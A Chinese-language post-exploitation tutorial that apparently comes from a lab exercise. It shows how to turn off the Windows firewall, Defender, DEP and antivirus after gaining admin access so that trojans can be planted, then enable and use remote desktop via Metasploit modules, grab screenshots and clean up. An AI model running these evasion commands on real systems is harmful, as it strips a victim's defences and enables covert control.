关闭防火墙
当我们拿下一台主机后,向在主机上留后门和放木马,那么我们的首要任务就是关闭主机的防火墙。因为防火墙会把我们的木马文件拦截。
首先先得到目标主机的管理员权限,并进入shell界面
然后在命令行中输入netsh advfirewall set alllprofiles state off
,将防火墙成功关闭
关闭windows Defender和DEP数据执行保护
可以看到计算机的Defender默认是开启的,defend和DEP会拦截我们的恶意操作,所以要将其关闭掉
然后在命令行中输入net stop windefend
关闭defender,键入bcdedit.exe /set {current} nx AlwaysOff
关闭DEP数据执行保护
关闭杀毒软件
关闭杀软应该是最最重要的一步了,想让木马安全放行,那么杀软必定是一个最大的阻碍。因为我的计算机上没有安装杀软,所以看不到效果,命令是run post/windows/manage/killav
开启远程桌面
可以看到远程主机上的3389端口是默认不开放的
现在我们退回到meterpreter命令行中,执行开启远程桌面操作,对目标主机执行更多更方便的操作做准备,首先执行run post/windows/manage/enable_rdp
命令
这里还提供了关闭和清除痕迹的脚本,我们可以看看其中的内容
可以看到,脚本是通过注册表的方式对远程桌面功能关闭的,并且创建了一个cmd进程,对防火墙的规则也进行了设置
然后我们通过上一节获取的用户名和密码,对目标主机进行远程连接,命令为rdesktop -u pyh -p 12 目标主机的IP地址
如果我们想看看目标主机的页面截图,我们也可以加载load espia
这个插件,然后输入screengrab即可保存目标主机的桌面截图
然后使用eog
这个软件查看保存的图片
关闭远程桌面,我们运行如下命令即可run multi_console_command -r /root/.msf4/loot/20210319210131_default_192.168.75.139_host.windows.cle_636232.txt
后面的txt文件是开启远程桌面时生成的关闭文件,替换掉即可